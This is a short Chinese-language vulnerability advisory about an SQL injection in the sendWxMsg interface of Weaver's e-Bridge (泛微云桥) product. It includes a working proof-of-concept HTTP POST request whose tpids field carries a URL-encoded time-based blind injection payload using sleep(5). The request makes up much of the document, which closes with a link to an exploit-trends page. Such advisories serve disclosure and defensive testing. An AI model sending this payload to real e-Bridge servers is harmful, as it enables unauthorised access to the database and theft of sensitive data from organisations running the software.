泛微云桥 e-Bridge sendWxMsg 接口存在SQL注入漏洞

2026-03-06 泛微云桥eBridge PoC Public

Description

泛微云桥 e-Bridge sendWxMsg 接口存在SQL注入漏洞,攻击者可获取数据库敏感信息

PoC

POST /wxthirdapi/sendWxMsg HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

userids=-1&tpids=1%27+or+%28select+%2A+from+%28select+sleep%285%29%29x%29+or+%27x%27%3D%27x

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities